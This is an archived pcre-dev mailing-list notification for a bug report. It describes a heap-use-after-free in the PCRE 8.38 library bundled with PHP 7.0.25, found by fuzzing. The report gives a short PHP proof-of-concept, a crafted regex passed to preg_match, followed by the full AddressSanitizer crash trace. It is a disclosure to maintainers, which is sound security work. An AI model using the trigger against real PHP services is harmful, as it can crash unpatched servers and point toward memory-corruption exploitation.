[pcre-dev] [Bug 2184] New: heap-use-after-free in php7.0.25(…

Top Page
Delete this message
Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 2184] New: heap-use-after-free in php7.0.25(bundled PCRE8.38)
https://bugs.exim.org/show_bug.cgi?id=2184

            Bug ID: 2184
           Summary: heap-use-after-free in php7.0.25(bundled PCRE8.38)
           Product: PCRE
           Version: 8.38
          Hardware: x86-64
                OS: Linux
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: idaifish@???
                CC: pcre-dev@???


Got the following ASAN report while fuzzing php7.0.25.

POC:
```
<?php
$pattern = "/(((?(?C)0?=))(?!()0|.(?0)0)())/";
preg_match($pattern, "hello");
?>


$ php poc.php
```

==70724==ERROR: AddressSanitizer: heap-use-after-free on address 0x621000006500
at pc 0x00000073da38 bp 0x7fffe63d7010 sp 0x7fffe63d7008
READ of size 1 at 0x621000006500 thread T0
    #0 0x73da37 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:3248:23
    #1 0x703b62 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #2 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #3 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #4 0x6e1a37 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #5 0x703b62 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #6 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #7 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #8 0x6e1a37 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #9 0x703b62 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #10 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #11 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #12 0x6e1a37 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #13 0x703b62 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #14 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #15 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #16 0x6e1a37 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #17 0x703b62 in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #18 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #19 0x7273ec in match
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #20 0x6d0957 in php_pcre_exec
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:6934:8
    #21 0x8cba4e in php_pcre_match_impl
/home/idai/PHPs/php-7.0.25/ext/pcre/php_pcre.c:808:11
    #22 0x8e6670 in php_do_pcre_match
/home/idai/PHPs/php-7.0.25/ext/pcre/php_pcre.c:693:2
    #23 0x2156fd4 in ZEND_DO_ICALL_SPEC_HANDLER
/home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:586:2
    #24 0x1f05c18 in execute_ex
/home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:417:7
    #25 0x1f06de9 in zend_execute
/home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:458:2
    #26 0x1cc2875 in zend_execute_scripts
/home/idai/PHPs/php-7.0.25/Zend/zend.c:1445:4
    #27 0x19368c7 in php_execute_script
/home/idai/PHPs/php-7.0.25/main/main.c:2518:14
    #28 0x2278e40 in do_cli /home/idai/PHPs/php-7.0.25/sapi/cli/php_cli.c:977:5
    #29 0x2275330 in main /home/idai/PHPs/php-7.0.25/sapi/cli/php_cli.c:1347:18
    #30 0x7f61132fd82f in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #31 0x432128 in _start (/home/idai/Workspace/pcre/php_asan+0x432128)


0x621000006500 is located 0 bytes inside of 4096-byte region
[0x621000006500,0x621000007500)
freed by thread T0 here:
    #0 0x4ea5f0 in __interceptor_cfree.localalias.0
(/home/idai/Workspace/pcre/php_asan+0x4ea5f0)
    #1 0x7f611335854a in _IO_setb (/lib/x86_64-linux-gnu/libc.so.6+0x7b54a)


previously allocated by thread T0 here:
    #0 0x4ea7a8 in malloc (/home/idai/Workspace/pcre/php_asan+0x4ea7a8)
    #1 0x7f611334a1d4 in _IO_file_doallocate
(/lib/x86_64-linux-gnu/libc.so.6+0x6d1d4)


    SUMMARY: AddressSanitizer: heap-use-after-free
/home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:3248:23 in match
    Shadow bytes around the buggy address:
      0x0c427fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c427fff8ca0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c427fff8cb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c427fff8cc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c427fff8cd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c427fff8ce0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c427fff8cf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==70724==ABORTING


--
You are receiving this mail because:
You are on the CC list for the bug.